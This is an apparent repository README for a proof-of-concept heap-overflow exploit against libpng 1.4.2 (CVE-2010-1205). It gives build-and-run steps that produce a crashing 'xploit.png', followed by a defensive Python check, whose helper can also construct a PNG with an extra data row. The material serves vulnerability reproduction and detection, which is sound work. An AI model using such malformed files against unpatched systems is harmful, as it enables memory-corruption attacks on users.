mk219533/CVE-2010-1205

Sample exploit for the CVE-2010-1205 vulnerability in libpng (<= 1.4.2)

gregbook - set of sample programs distributed with the libpng sources

generate - generates a malicious PNG file that triggers a heap overflow when the file is read with libpng


steps to reproduce:
./build.sh                  # build all libraries and executables. gregbook/rpng2-x is linked against libpng-1.4.2 (buggy)
./generate/build/generate   # generates xploit.png - malformed png file
cd gregbook/
./rpng2-x ../xploit.png     # run the example that shows how to use libpng to display a png file. Ends with Segmentation fault.


steps to run with fixed libpng version (1.4.3):
in gregbook/Makefile edit line 33:
PNGDIR = ../libpng-1.4.3
in gregbook directory run:
make clean && make
./rpng2-x ../xploit.png     # opens window with the png file
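
Added example, not part of this repository: a pre-parse check that flags PNG files whose inflated IDAT data holds more rows than IHDR declares, which is the condition the public CVE-2010-1205 description names ("an additional data row"). The layout of xploit.png is not shown on this page, so the sample input is constructed here; the function names, the non-interlaced restriction and the one-row inflate cap are assumptions of this sketch.

```python
import struct, zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
CHANNELS = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}  # colour type -> samples per pixel

def chunks(data):
    """Yield (type, payload) per chunk; CRCs are not verified in this sketch."""
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        yield ctype, data[pos + 8:pos + 8 + length]
        pos += 12 + length

def surplus_row_bytes(data):
    """Bytes of inflated IDAT data beyond height * row size (non-interlaced only)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    ihdr, idat = None, b""
    for ctype, payload in chunks(data):
        if ctype == b"IHDR":
            ihdr = payload
        elif ctype == b"IDAT":
            idat += payload
    if ihdr is None or len(ihdr) != 13:
        raise ValueError("missing or malformed IHDR")
    width, height, depth, colour, _, _, interlace = struct.unpack(">IIBBBBB", ihdr)
    if interlace or colour not in CHANNELS:
        raise ValueError("unsupported PNG variant for this check")
    row = 1 + (width * CHANNELS[colour] * depth + 7) // 8  # filter byte + pixels
    expected = row * height
    # Inflate at most one row past the declared size so oversized data cannot exhaust memory.
    inflated = zlib.decompressobj().decompress(idat, expected + row)
    return max(0, len(inflated) - expected)

def make_png(width, declared_height, rows_written):
    """Constructed 8-bit greyscale sample; rows_written may differ from the IHDR height."""
    def chunk(ctype, payload):
        crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
        return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", width, declared_height, 8, 0, 0, 0, 0)
    raw = (b"\x00" + b"\x80" * width) * rows_written
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")

if __name__ == "__main__":
    print(surplus_row_bytes(make_png(4, 2, 2)))  # well-formed sample
    print(surplus_row_bytes(make_png(4, 2, 3)))  # one row more than IHDR declares
```

A non-zero return value means the file should be rejected or quarantined before it reaches a libpng build older than 1.4.3.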
